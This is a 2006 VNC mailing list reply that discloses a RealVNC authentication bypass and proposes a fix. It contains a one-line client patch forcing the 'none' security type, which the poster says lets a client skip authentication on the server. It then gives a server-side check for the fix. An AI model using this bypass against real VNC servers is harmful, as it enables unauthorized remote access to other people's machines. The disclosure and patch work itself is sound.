Version 4.1.2

Sat, 13 May 2006 14:15:56 -0700 

On Sat, May 13, 2006 at 12:00:04PM +0100, [EMAIL PROTECTED] wrote:
> Date: Sat, 13 May 2006 01:47:49 -0500
> From: "James Evans" <[EMAIL PROTECTED]>
> To: [email protected]
> Subject: Version 4.1.2
> 
> Kudos for the quick fix! A lot of us are not going to be able to
> install it without the source though. When will it be released? I
> recommend everyone running VNC behind SSH if possible to mitigate
> these attacks.

I also looked for the source or a patch, but found non of them.
So I started looking for such a bug in the sources. 

The following exploit for the client makes the realvnc server
bypass any VNC authentification:

--- rfb/CConnection.old 2006-05-13 21:56:18.000000000 +0200
+++ rfb/CConnection.cxx 2006-05-13 21:58:10.000000000 +0200
@@ -181,6 +181,7 @@
       }
     }

+    secType=secTypeNone;
     // Inform the server of our decision
     if (secType != secTypeInvalid) {
       os->writeU8(secType);

A exploit for the java client could by implemented analogous.

The fix for the server is trivial (check, that the client response
is in the list of allowed security types):

--- rfb/SConnection.old 2006-05-13 21:58:56.000000000 +0200
+++ rfb/SConnection.cxx 2006-05-13 22:05:43.000000000 +0200
@@ -181,6 +181,17 @@
   vlog.info("Client requests security type %s(%d)",
             secTypeName(secType),secType);

+  std::list<rdr::U8> secTypes;
+  std::list<rdr::U8>::iterator i;
+  securityFactory->getSecTypes(&secTypes, reverseConnection);
+  for (i=secTypes.begin(); i!=secTypes.end(); i++)
+    if (*i == secType)
+      break;
+
+  if (*i != secType)
+    throwConnFailedException("unexpected security type");
+
+
   try {
     state_ = RFBSTATE_SECURITY;
     security = securityFactory->getSSecurity(secType, reverseConnection);

As these files are shared between Windows and Unix versions, they apply to
both of them (I tested only with the Linux version).

I have not seen any source of version 4.1.2 and not tested the binary version,
so I do not know, if this is the same problem, which was fixed in 4.1.2.

mfg Martin Kvgler
_______________________________________________
VNC-List mailing list
[email protected]
To remove yourself from the list visit:
http://www.realvnc.com/mailman/listinfo/vnc-list

Reply via email to